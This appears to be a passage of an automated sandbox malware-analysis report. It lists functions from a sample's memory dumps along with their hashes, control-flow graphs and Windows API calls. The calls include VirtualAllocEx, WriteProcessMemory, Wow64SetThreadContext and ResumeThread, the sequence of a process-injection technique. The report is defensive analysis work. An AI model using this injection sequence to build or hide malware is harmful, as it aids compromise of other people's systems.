                                                                                                                                                                                                                                  • Opcode ID: c005d8c828691348bcb36d28d63e5ff3d4f31c977a77dcdf71bce5e38ca86e5f
                                                                                                                                                                                                                                  • Instruction ID: a018b2673827bedae21b5701c2447e5876e883aefedf3419408744171f2c9380
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c005d8c828691348bcb36d28d63e5ff3d4f31c977a77dcdf71bce5e38ca86e5f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1E713670A00B058FD724DF6AD5557AABBF5FF88300F008A2ED48AD7A50DB74E945CB91
                                                                                                                                                                                                                                  Function 019344B4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 706 19344b4-19359b9 CreateActCtxA 709 19359c2-1935a1c 706->709 710 19359bb-19359c1 706->710 717 1935a2b-1935a2f 709->717 718 1935a1e-1935a21 709->718 710->709 719 1935a31-1935a3d 717->719 720 1935a40 717->720 718->717 719->720 722 1935a41 720->722 722->722
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateActCtxA.KERNEL32(?), ref: 019359A9
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.178878013804.0000000001930000.00000040.00000800.00020000.00000000.sdmp, Offset: 01930000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_1930000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Create
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2289755597-0
                                                                                                                                                                                                                                  • Opcode ID: 9af5cd8e801f012892d9fc2438c3c2537d2382e378114f4ff06d22e2806a4877
                                                                                                                                                                                                                                  • Instruction ID: c71b54501143574d0e26031b843c1671d79a0f7bc5e5a47376361a5bc3c9bfb9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9af5cd8e801f012892d9fc2438c3c2537d2382e378114f4ff06d22e2806a4877
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5241C2B1C0075DCBDB24CFAAC884BDEBBB5BF89304F60806AD448AB251DB756945CF50
                                                                                                                                                                                                                                  Function 019358ED Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 723 19358ed-19358ee 724 19358f8-19359b9 CreateActCtxA 723->724 726 19359c2-1935a1c 724->726 727 19359bb-19359c1 724->727 734 1935a2b-1935a2f 726->734 735 1935a1e-1935a21 726->735 727->726 736 1935a31-1935a3d 734->736 737 1935a40 734->737 735->734 736->737 739 1935a41 737->739 739->739
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateActCtxA.KERNEL32(?), ref: 019359A9
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.178878013804.0000000001930000.00000040.00000800.00020000.00000000.sdmp, Offset: 01930000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_1930000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Create
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2289755597-0
                                                                                                                                                                                                                                  • Opcode ID: 4d8245d436b5f0bcf8a12fa7de65ed2af32c78706d10c82456e02d4cef47e463
                                                                                                                                                                                                                                  • Instruction ID: b83f7dce495b387b64c0bd610aa928eb06d8f94c5f69912cb221fc505daa4de4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4d8245d436b5f0bcf8a12fa7de65ed2af32c78706d10c82456e02d4cef47e463
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0441D1B1C0031CCBDB24CFAAC884BDEBBB5BF89304F60805AD808AB251DB756949CF50
                                                                                                                                                                                                                                  Function 01939C90 Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 740 1939c90-1939c9c 741 1939cb5-1939d43 740->741 742 1939c9e-1939cb2 740->742 743 1939d45-1939d48 741->743 744 1939d4b-1939d4f 741->744 742->741 743->744 745 1939d51-1939d54 744->745 746 1939d57-1939d83 FindWindowW 744->746 745->746 747 1939d85-1939d8b 746->747 748 1939d8c-1939da0 746->748 747->748
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • FindWindowW.USER32(00000000,00000000), ref: 01939D76
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.178878013804.0000000001930000.00000040.00000800.00020000.00000000.sdmp, Offset: 01930000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_1930000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FindWindow
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 134000473-0
                                                                                                                                                                                                                                  • Opcode ID: ef1d00cf60da983efa1fcfcc658363a8c543b943b61b77e5c79f506acb5ea9ca
                                                                                                                                                                                                                                  • Instruction ID: 372adcbb34ea6cfbdaa8090f05efe132e3bf5696c798759640ea29290a03d24d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ef1d00cf60da983efa1fcfcc658363a8c543b943b61b77e5c79f506acb5ea9ca
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7E4177B6C043848FEB50CFA9E8857CABBF5BB66314F0A805EC808A7206D3795849CB51
                                                                                                                                                                                                                                  Function 07956DC9 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 750 7956dc9-7956dcc 751 7956d5c-7956d7d ReadProcessMemory 750->751 752 7956dce-7956e42 750->752 753 7956d86-7956db6 751->753 754 7956d7f-7956d85 751->754 761 7956e44-7956e4a 752->761 762 7956e4b-7956e70 752->762 754->753 761->762
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07956D70
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.178884084388.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7950000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MemoryProcessRead
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1726664587-0
                                                                                                                                                                                                                                  • Opcode ID: 949bccf39ca2f4ac2ed3cfcc6d9e0c879c6be5a032fae605ef49388afc236a23
                                                                                                                                                                                                                                  • Instruction ID: e3dc62c0b7dce706e0794d462316c6d198a7fdab3ba8342af74586318c7d3538
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 949bccf39ca2f4ac2ed3cfcc6d9e0c879c6be5a032fae605ef49388afc236a23
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C1318DB6D003598ECB20CFA9C8447EEFFF4AF88324F14881AC459A7250C7399555CBA1
                                                                                                                                                                                                                                  Function 01939BC8 Relevance: 1.6, APIs: 1, Instructions: 76COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 766 1939bc8-1939bd4 767 1939bd6-1939be8 766->767 768 1939bea-1939bfb 766->768 767->768 769 1939b86-1939b8e 768->769 770 1939bfc-1939c24 768->770 771 1939b90-1939b9c call 19385bc 769->771 772 1939bb9-1939bc1 769->772 775 1939c72-1939c8b 770->775 776 1939c26-1939c4e GetSystemMetrics 770->776 778 1939ba1-1939ba3 771->778 779 1939c50-1939c56 776->779 780 1939c57-1939c6b 776->780 778->772 781 1939ba5-1939bb2 call 1935334 778->781 779->780 780->775 781->772 785 1939bb4 781->785 785->772
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetSystemMetrics.USER32(0000004B), ref: 01939C3D
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.178878013804.0000000001930000.00000040.00000800.00020000.00000000.sdmp, Offset: 01930000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_1930000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MetricsSystem
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4116985748-0
                                                                                                                                                                                                                                  • Opcode ID: 796b2772e71e4f6c4cf6eb4951dc534ba96599f7da5f60067a80898cd9a2f874
                                                                                                                                                                                                                                  • Instruction ID: 96ea57e86dfbfa996d15f3206f84ba02dd4828427495f5b2f37b5550df683f9d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 796b2772e71e4f6c4cf6eb4951dc534ba96599f7da5f60067a80898cd9a2f874
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6A31E3B4804345CFEB20CF99D5443AEBBF8FB95319F1440AED949AB282D3789904CFA1
                                                                                                                                                                                                                                  Function 07956BF8 Relevance: 1.6, APIs: 1, Instructions: 70injectionCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07956C90
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.178884084388.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7950000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MemoryProcessWrite
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3559483778-0
                                                                                                                                                                                                                                  • Opcode ID: fdb3c24aafefe203e8e9406d9760a651dc3dbe26da812239704ba7722ca96fce
                                                                                                                                                                                                                                  • Instruction ID: baa67a242beb610e3396076a684acc54b75d782bc6615ce26b71d9f060348244
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fdb3c24aafefe203e8e9406d9760a651dc3dbe26da812239704ba7722ca96fce
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1F215AB6D003599FCB10CFA9C985BDEBBF5FF48314F10882AE958A7240D7789954CB60
                                                                                                                                                                                                                                  Function 07956C00 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07956C90
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.178884084388.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7950000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MemoryProcessWrite
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3559483778-0
                                                                                                                                                                                                                                  • Opcode ID: 560483d46a7d48ac3e1ca2f181c8c9e9712990f445b5cf08ac1e0988e12cb74a
                                                                                                                                                                                                                                  • Instruction ID: 76a43da3731c22ec403cad5a1be447f18a85e6d986431fb93fbdf69c61d287c4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 560483d46a7d48ac3e1ca2f181c8c9e9712990f445b5cf08ac1e0988e12cb74a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F3216BB5D003199FCB10CFAAC880BDEBBF5FF48314F508429E958A7240C7789950CBA0
                                                                                                                                                                                                                                  Function 07956CE8 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07956D70
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.178884084388.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7950000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MemoryProcessRead
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1726664587-0
                                                                                                                                                                                                                                  • Opcode ID: 32724042e66067bd3b2ca5c3884ca8fe3880e7923e4d4eec754d0a86a7b40f75
                                                                                                                                                                                                                                  • Instruction ID: 66fd9ea14a1e2ba6ed7912db667bff0cff9bb67bfc42b49e559023a8f6e6377f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 32724042e66067bd3b2ca5c3884ca8fe3880e7923e4d4eec754d0a86a7b40f75
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 06212AB5D002599FCB10DFAAC8857EEBBF5FF48310F50882AE459A7240C7389555DFA1
                                                                                                                                                                                                                                  Function 07956A61 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07956AE6
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.178884084388.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7950000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ContextThreadWow64
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 983334009-0
                                                                                                                                                                                                                                  • Opcode ID: e750b50f6011b9a1e8ed82d714462143adb78306d7ad0fa5a41294bdbfa15094
                                                                                                                                                                                                                                  • Instruction ID: d5045963d09192c64481e1a49342cbf95565188127785850ad6cab6a40f98344
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e750b50f6011b9a1e8ed82d714462143adb78306d7ad0fa5a41294bdbfa15094
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3D2138B6D003098FDB10CFAAC4857EEBBF5EF88324F54842AD859A7240D7789944CFA0
                                                                                                                                                                                                                                  Function 07956A68 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07956AE6
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.178884084388.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7950000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ContextThreadWow64
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 983334009-0
                                                                                                                                                                                                                                  • Opcode ID: e2ac7d15d46c2c890aa970d5e5d4fa0d5fe050c9c58c79bd2439f76751d53454
                                                                                                                                                                                                                                  • Instruction ID: daae978b80d8ef33e14ae561c63b582ecede8ee78abaca11e9ff19471d43b783
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e2ac7d15d46c2c890aa970d5e5d4fa0d5fe050c9c58c79bd2439f76751d53454
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D8213AB5D003098FDB10DFAAC4857EEBBF4EF48314F548429D859A7240C7789944CFA1
                                                                                                                                                                                                                                  Function 07956CF0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07956D70
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.178884084388.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7950000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MemoryProcessRead
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1726664587-0
                                                                                                                                                                                                                                  • Opcode ID: 0209a239aa21f6333c77b025c5c8c9325ee3a4f954ce478e23e5f7c9ee7527de
                                                                                                                                                                                                                                  • Instruction ID: cb201fe53063f0cfeb37b5307d98c7e59043feec8e8a61c81f3e16c6fb8c0910
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0209a239aa21f6333c77b025c5c8c9325ee3a4f954ce478e23e5f7c9ee7527de
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 05212AB1C003599FCB10CF9AC8846EEBBF5FF48310F508829D558A7240C7789550DB61
                                                                                                                                                                                                                                  Function 0193D660 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0193D6E7
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.178878013804.0000000001930000.00000040.00000800.00020000.00000000.sdmp, Offset: 01930000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_1930000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: DuplicateHandle
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3793708945-0
                                                                                                                                                                                                                                  • Opcode ID: cdae42c6f429c1dc5894b704eb464fdee4a111596b1d4290cf6438750bbfddc7
                                                                                                                                                                                                                                  • Instruction ID: 2ee3f5366970a497d3ec07c0fd14d0ddddeabe17a422f98557ec54d0986eab12
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cdae42c6f429c1dc5894b704eb464fdee4a111596b1d4290cf6438750bbfddc7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1F21E3B5D002489FDB10CF9AD884ADEBBF8FF48310F14841AE918A3310C378A954DF65
                                                                                                                                                                                                                                  Function 0193D658 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0193D6E7
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.178878013804.0000000001930000.00000040.00000800.00020000.00000000.sdmp, Offset: 01930000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_1930000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: DuplicateHandle
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3793708945-0
                                                                                                                                                                                                                                  • Opcode ID: 70f4328d71d4b99b50dac07b918f2669a6808e0784f948d5cc1e086ae69d61f8
                                                                                                                                                                                                                                  • Instruction ID: bf853df06c6899df46562d8cf56daeb580c419ba5e2103784b4536a0b412e999
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 70f4328d71d4b99b50dac07b918f2669a6808e0784f948d5cc1e086ae69d61f8
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2021E3B5D003489FDB10CFAAD585AEEBBF8FF48314F14841AE958A3250C378A954DF65
                                                                                                                                                                                                                                  Function 019385BC Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • FindWindowW.USER32(00000000,00000000), ref: 01939D76
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.178878013804.0000000001930000.00000040.00000800.00020000.00000000.sdmp, Offset: 01930000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_1930000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FindWindow
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 134000473-0
                                                                                                                                                                                                                                  • Opcode ID: f63c971a069cdc44a1720bb39558ef26d034f508f18c25ef13bd7c0bff8e8a22
                                                                                                                                                                                                                                  • Instruction ID: b4de12ff6fd97188c1a198616d8b0eed0fc38369b9d7b92e304e25481b977a61
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f63c971a069cdc44a1720bb39558ef26d034f508f18c25ef13bd7c0bff8e8a22
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7A21E4B58002099ADB14CF9AD489B9EFBF8BB89314F14852EE419A7600C378A944CBA1
                                                                                                                                                                                                                                  Function 01939DA8 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • FindWindowW.USER32(00000000,00000000), ref: 01939D76
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.178878013804.0000000001930000.00000040.00000800.00020000.00000000.sdmp, Offset: 01930000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_1930000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FindWindow
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 134000473-0
                                                                                                                                                                                                                                  • Opcode ID: 76dd3a1ec27dcc52e36f6d2aa6426b2dced756ac67317f2cbb16fa8580b92c12
                                                                                                                                                                                                                                  • Instruction ID: 156c17e4029558697169c8a61e5804a04abdcef4cda3b860a124f33921ae3db6
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 76dd3a1ec27dcc52e36f6d2aa6426b2dced756ac67317f2cbb16fa8580b92c12
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0E116D759007058BDB54CF9DD4483DAFBF4FF95328F24826AD819A7211D775A848CBA0
                                                                                                                                                                                                                                  Function 07956B38 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07956BAE
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.178884084388.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7950000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                                                                                                  • Opcode ID: 73da9559a02fbb98bcea01142702946bc459a21adbcf018b38198e709857fe4f
                                                                                                                                                                                                                                  • Instruction ID: 3692dfe1bb873290ed3d4146b38f6b408d6796f98df10bb7fb282b85a80e1b03
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 73da9559a02fbb98bcea01142702946bc459a21adbcf018b38198e709857fe4f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EC115C76C002499FCB10CFA9C4447DFBBF5BF88314F108819D455A7250C7799544CFA1
                                                                                                                                                                                                                                  Function 07956B40 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07956BAE
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.178884084388.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7950000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                                                                                                  • Opcode ID: 2dbd40c1e934defa633eee3d33267ef6baa486da377066ccfb0b864ec8fb2151
                                                                                                                                                                                                                                  • Instruction ID: 1cc8e4b7d44911862670ddeec4b00ae97008987784548738c191239bed88c368
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2dbd40c1e934defa633eee3d33267ef6baa486da377066ccfb0b864ec8fb2151
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CF1156B68002099FCB10CFAAC844AEEBBF9AF88324F108819D419A7250C7799940CFA0
                                                                                                                                                                                                                                  Function 07956578 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.178884084388.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7950000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ResumeThread
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 947044025-0
                                                                                                                                                                                                                                  • Opcode ID: 9882117b09ffd9fa7256aa3a3721ea10a4012b0986146ed138e86910e0355c0e
                                                                                                                                                                                                                                  • Instruction ID: 2a0e0a9a0d9c0999edeb8def709e7633e99ed674838cc4aec0cd07a0db754e59
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9882117b09ffd9fa7256aa3a3721ea10a4012b0986146ed138e86910e0355c0e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5D112BB5D003598EDB10DFAAC4857EEFBF5EF88324F24841AC459A7240C7789945CFA0
                                                                                                                                                                                                                                  Function 07956580 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.178884084388.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7950000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ResumeThread
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 947044025-0
